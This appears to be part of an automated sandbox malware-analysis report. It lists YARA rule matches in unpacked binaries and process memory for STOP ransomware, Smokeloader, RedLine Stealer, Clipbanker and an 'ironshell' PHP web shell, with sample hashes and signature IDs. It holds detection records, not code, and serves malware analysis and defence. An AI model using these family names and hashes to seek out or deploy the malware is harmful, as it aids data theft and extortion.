            Source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 19.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 17.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 17.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 12.2.DB15.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 16.2.DB15.exe.28715a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 18.2.DB15.exe.28915a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 22.2.DB15.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 21.2.DB15.exe.28a15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 43.2.build3.exe.24115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 21.2.DB15.exe.28a15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 16.2.DB15.exe.28715a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000006.00000002.2358389618.0000000000CAD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 0000002B.00000002.3313329838.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 0000002C.00000002.4539281116.00000000030F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 0000002C.00000002.4532684195.0000000002CF4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 0000000B.00000002.2820341095.00000000027D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 0000002B.00000002.3313063118.000000000083D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000015.00000002.2970592193.0000000002708000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000023.00000002.3157028193.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000001B.00000002.3053445351.000000000279C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 00000006.00000002.2358317151.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
            Source: 00000000.00000002.2120426554.0000000000D1F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 00000012.00000002.2843572828.00000000027F1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000010.00000002.2845428957.00000000027D6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
            Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
            Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
            Source: Process Memory Space: DB15.exe PID: 6336, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: DB15.exe PID: 7004, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
            Source: Process Memory Space: DB15.exe PID: 5368, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
